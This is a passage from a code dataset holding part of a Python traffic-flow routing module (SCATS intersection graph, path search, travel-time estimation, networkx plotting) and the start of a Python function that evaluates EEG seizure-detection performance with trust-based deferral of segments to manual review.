intersect_count: int, count of overlapping values\n \"\"\"\n\n intersect_count = 0\n for street in streets:\n if street in self.streets:\n intersect_count += 1\n return intersect_count\n\n def show_connection(self):\n \"\"\" Returns readable information as string\"\"\"\n\n return \"{0} - {1} {2}\".format(self.node.scats_number, self.streets[0], self.streets[1])\n\n def get_vector_from_name(self, name):\n \"\"\"Get vector from name\n Uses name to determine direction of connection as a vector\n # Arguements\n name: string, name of location\n # Returns\n result: Vector, direction represented as a vector\n \"\"\"\n\n words = name.upper().split(' OF ')\n direction = words[0].split()\n direction = direction[len(direction) - 1:][0]\n if direction == \"N\":\n return Vector(0, 1)\n elif direction == \"NE\":\n return Vector(1, 1)\n elif direction == \"E\":\n return Vector(1, 0)\n elif direction == \"SE\":\n 
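# --- Editorial aside (illustrative sketch, not part of this file): the if/elif chain in get_vector_from_name maps a compass token to a direction vector; a lookup table expresses the same mapping more compactly:\nCOMPASS = {'N': (0, 1), 'NE': (1, 1), 'E': (1, 0), 'SE': (1, -1), 'S': (0, -1), 'SW': (-1, -1), 'W': (-1, 0), 'NW': (-1, 1)}\n\ndef direction_from_name(name):\n    token = name.upper().split(' OF ')[0].split()[-1]  # same parse as above\n    return COMPASS.get(token)  # None for unknown tokens, as in the original\n\nassert direction_from_name('HIGH STREET_RD E of WARRIGAL_RD') == (1, 0)\n# --- end editorial aside ---\n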
return Vector(1, -1)\n elif direction == \"S\":\n return Vector(0, -1)\n elif direction == \"SW\":\n return Vector(-1, -1)\n elif direction == \"W\":\n return Vector(-1, 0)\n elif direction == \"NW\":\n return Vector(-1, 1)\n else:\n return None\n\n def get_streets_from_name(self, name):\n \"\"\"Get streets from name\n Convert name into list of streets\n # Arguements\n name: string, name of location\n # Returns\n result: list, streets of location\n \"\"\"\n words = name.upper().split(' OF ')\n streetB = words[1]\n streetA = words[0].split()\n streetA = ' '.join(streetA[:len(streetA) - 1])\n return [streetA, streetB]\n\n\nclass Graph(object):\n\n def __init__(self):\n self.nodes = []\n\n def get_path(self, origin, destination, restrictions):\n \"\"\"Get path\n Searchs graph to find a path from one node to the other, will not use restricted nodes\n # Arguements\n origin: Node, starting point for path\n destination: Node, goal for search\n restrictions: list of lists, restricts nodes at specific indexes in a path\n # Returns\n path: list of (Node, Connection), node being the step and connection being the route taken from previous step\n restrictions: list of lists, restrictions generated, or carried on, from generating paths\n \"\"\"\n\n path = [(self.get_node(origin), self.get_node(origin).incoming_connections[0])]\n path, restrictions = self.find_next_best_node(path, self.get_node(destination), 0, restrictions)\n return path, restrictions\n\n def find_next_best_node(self, path, destination, index, restrictions):\n \"\"\"Find next best node\n Finds the next node in the path which gets closer to the destination\n # Arguements\n path: list of (Node, Connection), path being constructed\n destination: Node, goal for search\n index: int, current depth of path/search\n restrictions: list of lists, restricts nodes at specific indexes in a path\n # Returns\n path: list of (Node, Connection), node being the step and connection being the route taken from previous step\n restrictions: list of lists, restrictions generated, or carried on, from generating paths\n \"\"\"\n\n restrictions.append([])\n for connection in path[index][0].outgoing_connections:\n if connection.node == destination:\n path.append((connection.node, connection))\n restrictions[index].append(path[index][0])\n return path, restrictions\n elif connection.node.coordinates.distance(destination.coordinates) < path[index][0].coordinates.distance(\n destination.coordinates):\n\n try:\n if connection.node in restrictions[index + 1]:\n return path, restrictions\n except:\n pass\n path.append((connection.node, connection))\n return self.find_next_best_node(path, destination, index + 1, restrictions)\n return path, restrictions\n\n def get_node(self, scats_number):\n \"\"\"Returns the first node which matches the provided scats number\"\"\"\n return next(x for x in self.nodes if x.scats_number == scats_number)\n\n def show_graph(self):\n \"\"\"Prints the graph in a readable format\"\"\"\n\n for node in self.nodes:\n print(\"{0} - {1} {2}\\nConnections:\".format(node.scats_number, node.incoming_connections[0].streets[0],\n node.incoming_connections[0].streets[1]))\n for connection in node.outgoing_connections:\n print(\"\\t{0}\".format(connection.show_connection()))\n print(\"\\n\")\n\n def get_paths(self, origin, destination, min_path_count, model, time_in_minutes):\n \"\"\"Get paths\n Finds multiple unique paths to the same destination\n # Arguements\n origin: Node, starting point for path\n destination: Node, goal for search\n min_path_count: 
 paths = []\n restrictions = []\n for x in range(min_path_count):\n path, restrictions = self.get_path(origin, destination, restrictions)\n if path[-1][0].scats_number != destination:\n print(\"\\nNo more alternative paths.\")\n break\n paths.append(path)\n print(\"=====\")\n total_cost = 0\n elapsed_time = 0\n index = 0\n for i, j in path:\n if index + 1 == len(path):\n break\n if index == 0:\n print(\"Origin: {0} - {1} {2}.\".format(i.scats_number, j.streets[0], j.streets[1]))\n else:\n time_index = floor((time_in_minutes + elapsed_time) / 15)\n volume = j.get_model(model)[time_index]\n total_cost += volume\n distance_in_km = i.coordinates.distance(path[index + 1][0].coordinates)\n time = self.calculate_time(volume, 60, distance_in_km)\n print(\"{0} - {1} {2}. Cost: {3:.2f} mins Distance {4:.2f}km. Node coordinates: {5}\".format(\n i.scats_number, j.streets[0],\n j.streets[1], time * 60,\n distance_in_km, i.coordinates))\n elapsed_time += time * 60\n index += 1\n\n print(\"\\n\\t Total time to destination: {0:.0f} mins {1} seconds\".format(elapsed_time, decimal_to_seconds(\n elapsed_time - floor(elapsed_time))))\n return paths\n\n def calculate_time(self, volume, speed_limit, distance):\n \"\"\"Calculate time\n Calculates travel time in hours (callers multiply by 60 to get minutes)\n # Arguments\n volume: float, volume of cars at time of traversal\n speed_limit: float, max speed on road\n distance: float, length of road\n # Returns\n result: float, travel time in hours\n \"\"\"\n\n
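 # Editor's worked example: 2 km at 40 km/h -> 2 / 40 = 0.05 h, i.e. 3 minutes once get_paths applies time * 60.\n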
 travel_speed = get_speed_coefficient(volume, speed_limit)\n print(\"Speed: {0}. Volume {1}\".format(travel_speed, volume))\n return distance / travel_speed\n\n\ndef get_speed_coefficient(volume, speed_limit):\n \"\"\"Get speed coefficient\n Calculates speed using the quadratic formula based on volume\n # Arguments\n volume: float, volume of cars at time of traversal\n speed_limit: float, maximum speed\n # Returns\n result: x where y = Ax^2 + Bx + C, clamped between 0 and speed_limit\n \"\"\"\n\n A = -0.9765625\n B = 62.5\n C = volume\n speed = 60\n D = pow(B, 2) - (4 * A * -C)\n # NOTE (editor): as written, sqrt(D) / (2 * A) binds before the subtraction from -B;\n # the +94.5 offset appears tuned to this exact form, so the expression is left unchanged.\n return np.clip(((-B - sqrt(D) / (2 * A)) + 94.5), 0, speed_limit)\n\n\ndef decimal_to_seconds(value):\n \"\"\"Converts a fraction of a minute to seconds\"\"\"\n\n return floor((value / 100) * 6000)\n\n\ndef get_graph():\n \"\"\"Constructs Node graph for representing network of scats sites\"\"\"\n\n graph = Graph()\n\n for scats in SCATS_DATA.get_all_scats_numbers():\n coordinates = SCATS_DATA.get_positional_data(scats)\n node = Node(scats, coordinates)\n # print(\"adding connections for {0}\".format(scats))\n for approach in SCATS_DATA.get_scats_approaches_names(scats):\n connection_id = SCATS_DATA.get_location_id(approach)\n node.incoming_connections.append(Connection(approach, connection_id, node))\n graph.nodes.append(node)\n\n for node in graph.nodes:\n node.find_outgoing_connections(graph)\n return graph\n\n\ndef make_graph():\n graph = get_graph()\n\n excluded_nodes = [2846, 2200, 2825, 2820, 4812, 4821]\n G = nx.DiGraph()\n for node in graph.nodes:\n if node.coordinates.x != 0:\n if node.scats_number not in excluded_nodes:\n G.add_node(node.scats_number, pos=node.coordinates.to_tuple())\n\n for connection in node.outgoing_connections:\n if connection.node.scats_number not in excluded_nodes:\n G.add_edge(node.scats_number, connection.node.scats_number)\n\n pos = nx.get_node_attributes(G, 'pos')\n nx.draw_networkx_nodes(G, pos, node_size=200)\n nx.draw_networkx_edges(G, pos, edgelist=G.edges(), edge_color='black')\n nx.draw_networkx_labels(G, pos)\n\n\ndef route_graph(origin, destination, min_path_count, model, time_in_minutes):\n \"\"\"Returns graph with highlighted path\"\"\"\n graph = get_graph()\n paths = graph.get_paths(origin, destination, min_path_count, model, time_in_minutes)\n excluded_nodes = [2846, 2200, 2825, 2820, 4812, 4821]\n G = nx.DiGraph()\n for node in graph.nodes:\n if node.coordinates.x != 0:\n if node.scats_number not in excluded_nodes:\n G.add_node(node.scats_number, pos=node.coordinates.to_tuple())\n\n for connection in node.outgoing_connections:\n if connection.node.scats_number not in excluded_nodes:\n G.add_edge(node.scats_number, connection.node.scats_number)\n\n colour_map = []\n for node in G:\n colour_map.append(set_node_colour(node, paths))\n edge_colour_map = []\n edge_size_map = []\n for edge in G.edges():\n colour, size = set_edge_attributes(edge, paths)\n edge_colour_map.append(colour)\n edge_size_map.append(size)\n\n pos = nx.get_node_attributes(G, 'pos')\n nx.draw_networkx_nodes(G, pos, node_size=200, node_color=colour_map)\n nx.draw_networkx_edges(G, pos, edgelist=G.edges(), edge_color=edge_colour_map, width=edge_size_map)\n nx.draw_networkx_labels(G, pos)\n\n\ndef set_node_colour(node, paths):\n for i, j in paths[0]:\n if node == i.scats_number:\n return 'red'\n return 'gray'\n\n\ndef set_edge_attributes(edge, paths):\n x = 0\n for i, j in paths[0]:\n if edge[0] == i.scats_number:\n node = None\n try:\n node = paths[0][x + 1][1].node.scats_number\n if edge[1] == node:\n return 'red', 4\n else:\n return 'black', 0\n except IndexError:\n # reached the end of the path; fall through to the default style\n print(\"oops\")\n x += 1\n return 
'black', 1\n\n\ndef main():\n graph = get_graph()\n graph.show_graph()\n\n route_graph(970, 4040, 5, \"gru\", 0 * 4 * 15)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"joshhehir/Traffic-Flow-Prediction","sub_path":"TFPS/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":18915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26061251520","text":"import sys\nsys.path.insert(1, '../')\nimport numpy as np \nimport time\nimport aux_functions as af\nimport aux_functions_remove as afr\nimport segment_count as sc\n\n\ndef cwr(SVM_DISTANCES=False, REMOVE_ONLY_NOSEIZURE=True, SAME_PERCENTILE=True, TRUST_SCORE_FILTERING=False, p_low_trust=5):\n\n time_start_all = time.time()\n\n #############################################################\n # the indices in the arrays are the real indices in Python #\n # so idx = [2, 5] should be sliced as ar[2:6] #\n #############################################################\n\n # directories containing the labels and the features\n # these are not function for the Github version.\n labels_dir_base = '/Annotations_outputs_classifier/'\n trustmodels_dir_base = '/trust_models/'\n svm_scores_dir = '/SVM_confidence/'\n # patient IDs with measurements\n pat_id_arr_original = [10,12,13,14,15,16,17,22,24,30,33,34,36,40,41,54,56,59,61,63,64,65,67,68,70,71,72,73,74,75,\n 76,77,78,79,82,83,89,90,93,94,95,99]\n pat_id_arr_new = [11, 25, 28, 35, 47, 48, 58, 60, 66, 80, 92, 98]\n\n pat_id_arr = pat_id_arr_original + pat_id_arr_new\n n_pat = len(pat_id_arr)\n\n # classify all samples (used for debugging purposes)\n REJECT_NOTHING = False\n # use the SVM model trained on the aimII labels or not (= SVM trained on aimII labels)\n AIMII_SVM_MODEL = True\n # use the trust models trained on the aimII train labels\n TRAIN_LABELS_TRUST = False\n\n # number of minutes in a segment that contains a possible seizure\n n_minute_interval_seizure = 5\n n_seconds_interval_seizure = n_minute_interval_seizure * 60\n # number of minutes in a segment that doesn't contain a seizure\n n_minute_interval_no_seizure = 5\n n_seconds_interval_no_seizure = n_minute_interval_no_seizure * 60\n\n # create dictionaries of different inputs\n # done for efficiency purposes (although in the end, influence on speed was small)\n dict_labels = {}\n dict_seizure_timings = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n # note that this should actually have been called aim2\n fln_labels_all = labels_dir_base + 'Patient_labelsaim1_' + str(pid) + '.npy'\n labels_all = af.load_with(fln_labels_all)\n dict_labels[pid_str] = labels_all\n dict_seizure_timings[pid_str] = af.calculate_real_seizure_timings(labels_all)\n dict_predictions = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n if AIMII_SVM_MODEL:\n str_predictions = 'Patient_predictions_aimII_rmsa_'\n else:\n str_predictions = 'Patient_predictions_rmsa_'\n fln_predictions_all = labels_dir_base + str_predictions + str(pid) + '.npy'\n dict_predictions[pid_str] = af.load_with(fln_predictions_all)\n dict_idx_to_check = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n predictions_all = dict_predictions[pid_str]\n idx_to_check = af.calc_idx_to_check_for_seizure(predictions_all, min_n_ones=4)\n dict_idx_to_check[pid_str] = idx_to_check\n dict_trust = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n if SVM_DISTANCES:\n if AIMII_SVM_MODEL:\n scores_svm_dir = '/SVM_confidence_aimII/'\n svm_string = 'svm_aimII_scores_pat_'\n else:\n scores_svm_dir = 
'/SVM_confidence/'\n svm_string = 'svm_scores_pat_'\n ts_filename = scores_svm_dir + svm_string + str(pid) + '.npy'\n trust_scores_pat = af.load_with(ts_filename)\n # take absolute value\n # dict_trust[pid_str] = abs(trust_scores_pat)\n # take the set-up with the best result for the classify-all scenario:\n # sigmoid with a = 0.01\n a_temp_scaling = 0.1\n dict_trust[pid_str] = af.sigmoid_trust(trust_scores_pat, a=a_temp_scaling)\n else:\n if AIMII_SVM_MODEL:\n if TRAIN_LABELS_TRUST:\n ts_filename = trustmodels_dir_base + 'trust_scores_aimII_kaat_pat_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy' \n else:\n ts_filename = trustmodels_dir_base + 'trust_scores_aimII_pat_all_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy' \n else:\n if TRAIN_LABELS_TRUST:\n ts_filename = trustmodels_dir_base + 'trust_scores_kaat_pat_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy'\n else:\n ts_filename = trustmodels_dir_base + 'trust_scores_pat_all_' + str(pid) + '_alpha_0p05_k_10_filtering_none_noseizesegments_100pca_20.npy'\n trust_scores_pat = af.load_with(ts_filename)\n dict_trust[pid_str] = trust_scores_pat\n dict_seizure_flags = {}\n for pid in pat_id_arr:\n pid_str = str(pid)\n start_idx = dict_idx_to_check[pid_str]\n predictions_all = dict_predictions[pid_str]\n if TRUST_SCORE_FILTERING:\n trust_scores_pat = dict_trust[pid_str]\n trust_scores_pat = np.array(trust_scores_pat)\n start_idx = np.array(start_idx)\n start_idx = start_idx.astype(int)\n # if SVM_DISTANCES:\n # seizure_flags_all, n_not_trusted = af.calculate_seizure_flags_w_trustscores_fast(\n # label_input=predictions_all, trust_scores=trust_scores_pat, percentile_level=0.1, idx_to_check=start_idx)\n # else:\n if AIMII_SVM_MODEL:\n seizure_flags_all, n_not_trusted = af.calculate_seizure_flags_w_trustscores_fast(\n label_input=predictions_all, trust_scores=trust_scores_pat, percentile_level=9.6, idx_to_check=start_idx)\n else:\n seizure_flags_all, n_not_trusted = af.calculate_seizure_flags_w_trustscores_fast(\n label_input=predictions_all, trust_scores=trust_scores_pat, percentile_level=2.0416666, idx_to_check=start_idx)\n else:\n seizure_flags_all = af.calculate_seizure_flags_fast(predictions_all, start_idx)\n dict_seizure_flags[pid_str] = seizure_flags_all \n\n det_sens_perc_av = []\n det_sens_perc_std = []\n det_sens_perc_med = []\n det_sens_perc_range = []\n\n FP_perc_av = []\n FP_perc_std = []\n FP_perc_med = []\n FP_perc_range = []\n\n F1_perc_av = []\n F1_perc_std = []\n F1_perc_med = []\n F1_perc_range = []\n\n PPV_perc_av = []\n PPV_perc_std = []\n PPV_perc_med = []\n PPV_perc_range = [] \n\n dd_perc_av = []\n dd_perc_std = []\n dd_perc_med = []\n dd_perc_range = []\n\n # number of seizures per patient\n n_seizures = [0, 1, 8, 1, 1, 8, 2, 2, 1, 0, 3, 0, 3, 2, 1, 0, 1, 1, 1, 2, 0, 5, 1, 4, 17, 5, 3, 2, \n 3, 2, 6, 0, 5, 2, 6, 2, 0, 1, 2, 3, 1, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n # print(\"total number of seizures = \" + str(sum(n_seizures))) \n\n perc_removed_arr = []\n per_arr = [0, 0.1, 1, 5, 10, 15, 20, 25, 30, 35, 40, 50, 60, 70, 80, 90]\n # if the segments are removed with different percentiles\n # calculate the distribution of all trust scores\n if not SAME_PERCENTILE:\n all_trust_all_patient = []\n for cnt in range(n_pat):\n pat_id = pat_id_arr[cnt]\n pid_str = str(pat_id)\n predictions_all = dict_predictions[pid_str]\n labels_all = dict_labels[pid_str]\n seizure_flags_all = dict_seizure_flags[pid_str]\n # put these into 
\"n_minute_interval\"-minute seizure segments\n length_full_eeg = predictions_all.shape[0]\n # for each seizure flag -> take -2.5 minutes and +2.5 minutes\n # [s_1, e_1], [s_2, e_2], ...\n # if there is overlap overlap e_i and s_i+1 -> merge \n if len(seizure_flags_all) > 0:\n possible_seizure_segments = afr.predicted_seizure_segments(seizure_flags_all, full_length=length_full_eeg, interval=n_seconds_interval_seizure, collate=True)\n else:\n possible_seizure_segments = np.array([])\n # create non-seizure segments\n non_seizure_segments = afr.predicted_non_seizure_segments(interval=n_seconds_interval_no_seizure, full_length=length_full_eeg, seiz_segments=possible_seizure_segments) \n # if there are no \"non-seizure segments\": print a warning\n # this should normally only happen if > 99% of segments are removed\n if np.array(non_seizure_segments).shape[0] == 0:\n print(\"did not find any \\\"no seizure segments\\\" for patient id: \" + str(pat_id))\n print(\"\")\n trust_scores_pat = dict_trust[pid_str] \n # has to be casted as \"float32\" to avoid errors with \"nanmean\". Is an issue with numpy, not the code here.\n trust_scores_pat = np.array(trust_scores_pat, dtype='float32')\n nonseizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=non_seizure_segments, lowest_percent=p_low_trust) \n nonseizure_segments_trusts = np.array(nonseizure_segments_trusts)\n if REMOVE_ONLY_NOSEIZURE:\n all_trust_all_patient = all_trust_all_patient + list(nonseizure_segments_trusts)\n else:\n if possible_seizure_segments.shape[0] > 0:\n possible_seizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=possible_seizure_segments, lowest_percent=p_low_trust)\n all_trust_all_patient = all_trust_all_patient + list(nonseizure_segments_trusts) \n all_trust_all_patient = all_trust_all_patient + list(possible_seizure_segments_trusts)\n else:\n all_trust_all_patient = all_trust_all_patient + list(nonseizure_segments_trusts)\n # impute NaNs by the median trust score\n all_trust_all_patient = np.array(all_trust_all_patient)\n nan_mask = np.isnan(all_trust_all_patient)\n all_trust_all_patient[nan_mask] = np.nanmedian(all_trust_all_patient)\n\n mean_seg_length = [] \n std_seg_length = []\n n_seg_per_day = []\n\n # start of the main loop \n for per in per_arr:\n print(\"\")\n print(\"per = \" + str(per))\n perc_checked = 0.\n FP_tot = 0 # for debugging purposes\n\n # define arrays that contain the performances\n F1_final = []\n PPV_final = []\n detection_sensitivity_final = []\n FP_rate_final = []\n detection_delay_final = []\n\n # determine threshold for patient-specific removal strategy\n if not SAME_PERCENTILE:\n threshold_per = np.percentile(all_trust_all_patient, per)\n \n mean_length_pat_arr = [] \n std_length_pat_arr = []\n n_seg_pat_arr = []\n\n for cnt in range(n_pat):\n pat_id = pat_id_arr[cnt]\n pid_str = str(pat_id)\n ########################################################\n # find all possible segments containing a seizure flag #\n ########################################################\n predictions_all = dict_predictions[pid_str]\n labels_all = dict_labels[pid_str]\n full_seizure_timings = dict_seizure_timings[pid_str]\n seizure_flags_all = dict_seizure_flags[pid_str]\n length_full_eeg = predictions_all.shape[0]\n # for each seizure flag -> take - (n_minute_interval / 2) minutes and + (n_minute_interval / 2) minutes\n # [s_1, e_1], [s_2, e_2], ...\n # if there is overlap overlap e_i and s_i+1 -> merge \n if 
len(seizure_flags_all) > 0:\n possible_seizure_segments = afr.predicted_seizure_segments(seizure_flags_all, full_length=length_full_eeg, interval=n_seconds_interval_seizure, collate=True)\n else:\n possible_seizure_segments = np.array([])\n # create non-seizure segments\n non_seizure_segments = afr.predicted_non_seizure_segments(interval=n_seconds_interval_no_seizure, full_length=length_full_eeg, seiz_segments=possible_seizure_segments) \n # if there are no \"non-seizure segments\": print a warning\n # this should normally only happen if > 99% of segments are removed\n if np.array(non_seizure_segments).shape[0] == 0:\n print(\"did not find any \\\"no seizure segments\\\" for patient id: \" + str(pat_id))\n print(\"\")\n #################################################\n # calculate average trust score of each segment #\n #################################################\n trust_scores_pat = dict_trust[pid_str] \n # has to be casted as \"float32\" to avoid errors with \"nanmean\". This is an issue with numpy, not this code.\n trust_scores_pat = np.array(trust_scores_pat, dtype='float32')\n nonseizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=non_seizure_segments, lowest_percent=p_low_trust)\n nonseizure_segments_trusts = np.array(nonseizure_segments_trusts)\n if possible_seizure_segments.shape[0] > 0:\n possible_seizure_segments_trusts = afr.calc_trust_of_segments_variable_length(trust_arr=trust_scores_pat, segments=possible_seizure_segments, lowest_percent=p_low_trust)\n possible_seizure_segments_trusts = np.array(possible_seizure_segments_trusts)\n # combine all the trust scores for the seizure / nonseizure segments\n if not REMOVE_ONLY_NOSEIZURE:\n all_segments_trusts = list(nonseizure_segments_trusts) + list(possible_seizure_segments_trusts)\n else:\n all_segments_trusts = list(nonseizure_segments_trusts)\n # impute NaNs with median\n all_segments_trusts = np.array(all_segments_trusts)\n nan_mask = np.isnan(all_segments_trusts)\n nanmed_all = np.nanmedian(all_segments_trusts)\n all_segments_trusts[nan_mask] = nanmed_all\n nan_mask = np.isnan(possible_seizure_segments_trusts)\n possible_seizure_segments_trusts[nan_mask] = nanmed_all\n nan_mask = np.isnan(nonseizure_segments_trusts)\n nonseizure_segments_trusts[nan_mask] = nanmed_all\n if SAME_PERCENTILE:\n low_confidence_segments_seizure = np.where(possible_seizure_segments_trusts <= np.percentile(all_segments_trusts, per))[0]\n else:\n low_confidence_segments_seizure = np.where(possible_seizure_segments_trusts <= threshold_per)[0]\n if low_confidence_segments_seizure.shape[0] == 0:\n low_confidence_segments_seizure = np.array([])\n if REJECT_NOTHING:\n low_confidence_segments_seizure = np.array([])\n low_confidence_segments_seizure = np.array(low_confidence_segments_seizure)\n possible_seizure_segments = np.array(possible_seizure_segments)\n if low_confidence_segments_seizure.shape[0] > 0:\n low_confidence_segments_full = possible_seizure_segments[low_confidence_segments_seizure]\n else:\n low_confidence_segments_full = np.array([])\n if REMOVE_ONLY_NOSEIZURE:\n low_confidence_segments_full = possible_seizure_segments\n segments_to_check_seizure = []\n else:\n segments_to_check_seizure = afr.collate_trusted_segments(all_segments=possible_seizure_segments, non_trusted_segments_idx=low_confidence_segments_seizure)\n manual_detection_seizure_segments = afr.seizure_detected_manually(low_confidence_segments_full, full_seizure_timings, n_seconds_needed=10)\n 
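# Editor's note (inferred from the afr.* call signatures, not verified against aux_functions_remove):\n # the manual_detection_* arrays seem to simulate a human reviewer for the deferred low-trust segments;\n # a deferred segment counts as a manual detection when it overlaps a true seizure for at least\n # n_seconds_needed seconds (10 s here, 1 s for the seizure flags below).\n 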
manual_detection_flags_seizure_segments = afr.false_positive_detected_manually(low_confidence_segments_full, seizure_flags_all, n_seconds_needed=1)\n else:\n manual_detection_seizure_segments = np.array([])\n manual_detection_flags_seizure_segments = np.array([])\n segments_to_check_seizure = []\n all_segments_trusts = nonseizure_segments_trusts \n nan_mask = np.isnan(all_segments_trusts)\n all_segments_trusts[nan_mask] = np.nanmedian(all_segments_trusts)\n nan_mask = np.isnan(nonseizure_segments_trusts)\n nonseizure_segments_trusts[nan_mask] = np.nanmedian(all_segments_trusts)\n #########################################################\n # defer the low-trusted segments, and classify the rest #\n #########################################################\n if SAME_PERCENTILE: # remove separate percentile per patient\n low_confidence_segments = np.where(nonseizure_segments_trusts <= np.percentile(all_segments_trusts, per))[0]\n else:\n low_confidence_segments = np.where(nonseizure_segments_trusts <= threshold_per)[0]\n if REJECT_NOTHING:\n low_confidence_segments = np.array([])\n # calculate segments to check\n segments_to_check_non_seizure = afr.collate_trusted_segments(all_segments=non_seizure_segments, non_trusted_segments_idx=low_confidence_segments)\n low_confidence_segments = np.array(low_confidence_segments)\n non_seizure_segments = np.array(non_seizure_segments)\n low_confidence_segments_full = non_seizure_segments[low_confidence_segments]\n manual_detection_nonseizure_segments = afr.seizure_detected_manually(low_confidence_segments_full, full_seizure_timings, n_seconds_needed=10)\n manual_detection_flags_nonseizure_segments = afr.false_positive_detected_manually(low_confidence_segments_full, seizure_flags_all, n_seconds_needed=1)\n if manual_detection_seizure_segments.shape[0] > 0:\n manual_detection_segments = manual_detection_nonseizure_segments | manual_detection_seizure_segments\n else:\n manual_detection_segments = manual_detection_nonseizure_segments\n if manual_detection_flags_seizure_segments.shape[0] > 0:\n manual_detection_flags_segments = manual_detection_flags_seizure_segments | manual_detection_flags_nonseizure_segments\n else:\n manual_detection_flags_segments = manual_detection_flags_nonseizure_segments\n if possible_seizure_segments.shape[0] > 0:\n segments_to_check_seizure = np.array(segments_to_check_seizure)\n segments_to_check_non_seizure = np.array(segments_to_check_non_seizure)\n if (segments_to_check_seizure.shape[0] > 0) and (segments_to_check_non_seizure.shape[0] > 0):\n segments_to_check = afr.merge_segments_seizure_no_seizure(seizure_segments=segments_to_check_seizure, no_seizure_segments=segments_to_check_non_seizure)\n elif segments_to_check_non_seizure.shape[0] > 0:\n segments_to_check = segments_to_check_non_seizure\n else:\n segments_to_check = segments_to_check_seizure\n else:\n segments_to_check = segments_to_check_non_seizure\n n_hours_checked = 0\n segm_cnt = 0\n TP = 0\n FP = 0\n FN = 0\n total_seizures = 0\n n_seconds_checked = 0.\n n_seizures_in_non_rejected_part = 0\n detection_delay_segments = []\n n_seg_pat, mean_length_pat, std_length_pat = sc.count_segments(segments_to_check, total_length=length_full_eeg)\n mean_length_pat_arr.append(mean_length_pat)\n std_length_pat_arr.append(std_length_pat)\n n_seg_pat_arr.append(n_seg_pat)\n for segment in segments_to_check:\n seizure_in_segment, detected_manually_in_segment, cnt_cutting_error = afr.seizure_timings_in_segment(segment, full_seizure_timings, manual_detection_segments)\n 
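# Editor's note: the block below presumably shifts the global timings/flags into segment-local\n # indices (afr.shift_2d_array / afr.shift_1d_array) so TP/FP/FN can be scored per kept segment,\n # independent of where the segment sits in the full recording.\n 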
predicted_in_segment, predicted_manually_in_segment = afr.seizure_fp_in_segment(segment, seizure_flags_all, manual_detection_flags_segments)\n start_idx = int(segment[0])\n end_idx = int(segment[1] + 1)\n n_seconds_checked += (end_idx - start_idx)\n seizure_timings = afr.shift_2d_array(seizure_in_segment, start_idx, end_idx)\n seizure_flags = afr.shift_1d_array(seizure_flags_all, start_idx, end_idx)\n TP_seg, FP_seg, FN_seg, total_seizures_seg, det_delay = afr.precision_metrics_kaat_10s_w_remove_w_fp(seizure_flags, seizure_timings, detected_manually_in_segment, predicted_manually_in_segment)\n detection_delay_segments = detection_delay_segments + det_delay\n TP += TP_seg\n FP += FP_seg\n FN += FN_seg\n FN += cnt_cutting_error\n total_seizures += (total_seizures_seg - sum(detected_manually_in_segment))\n n_seizures_in_non_rejected_part += seizure_timings.shape[0]\n perc_checked += (float(n_seconds_checked) / float(length_full_eeg))\n if REMOVE_ONLY_NOSEIZURE:\n if n_seizures[cnt] > 0:\n seizures_detected_by_neurologist = n_seizures[cnt] - total_seizures\n TP = float(seizures_detected_by_neurologist)\n FN = float(total_seizures)\n if seizures_detected_by_neurologist > 0:\n detection_sensitivity = TP / (TP + FN)\n F1 = 2.*TP / (2.*TP + FN)\n PPV = 1.\n else:\n detection_sensitivity = 0.\n F1 = 0.\n PPV = 0.\n F1_final.append(F1)\n PPV_final.append(PPV)\n detection_sensitivity_final.append(detection_sensitivity)\n detection_delay_final.append(0)\n FP_rate_final.append(0)\n else:\n if n_seizures[cnt] > 0:\n seizures_detected_by_neurologist = n_seizures[cnt] - total_seizures\n TP = float(TP) + float(seizures_detected_by_neurologist)\n if int(TP) > 0:\n detection_sensitivity = TP / (TP + FN)\n PPV = TP / (TP + FP)\n F1 = 2.*TP / (2.*TP + FP + FN)\n else:\n detection_sensitivity = 0.\n F1 = 0.\n PPV = 0.\n F1_final.append(F1)\n PPV_final.append(PPV)\n detection_sensitivity_final.append(detection_sensitivity)\n det_delay_neurologist = [0] * seizures_detected_by_neurologist\n det_delay_combined = detection_delay_segments + det_delay_neurologist\n detection_delay_final.append(np.mean(det_delay_combined))\n n_hours = float(labels_all.shape[0]) / (60. * 60.)\n n_hours_checked = float(n_seconds_checked) / (60. * 60.)\n if int(n_hours_checked) == 0:\n FP_rate = 0\n else:\n FP_rate = 24. * FP / n_hours_checked\n FP_rate_final.append(FP_rate)\n\n FP_tot += FP\n perc_removed_arr.append(1. 
- (perc_checked / float(n_pat)))\n\n mean_seg_length.append(np.mean(np.array(mean_length_pat_arr)))\n std_seg_length.append(np.mean(np.array(std_length_pat_arr)))\n n_seg_per_day.append(np.mean(np.array(n_seg_pat_arr)))\n\n Z_val = 1.96\n n_estimates = len(pat_id_arr)\n sqrt_n = np.sqrt(n_estimates)\n Zdsn = Z_val / sqrt_n\n\n print(\"FP rate: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(FP_rate_final, Zdsn)\n FP_perc_av.append(mn)\n FP_perc_std.append(st)\n FP_perc_med.append(med)\n FP_perc_range.append([rmin, rmax])\n \n print(\"detection sensitivity: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(detection_sensitivity_final, Zdsn)\n det_sens_perc_av.append(mn)\n det_sens_perc_std.append(st)\n det_sens_perc_med.append(med)\n det_sens_perc_range.append([rmin, rmax])\n\n print(\"PPV: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(PPV_final, Zdsn)\n PPV_perc_av.append(mn)\n PPV_perc_std.append(st)\n PPV_perc_med.append(med)\n PPV_perc_range.append([rmin, rmax])\n\n print(\"F1: \")\n mn, st, med, rmax, rmin = af.print_summary_statistics(F1_final, Zdsn)\n 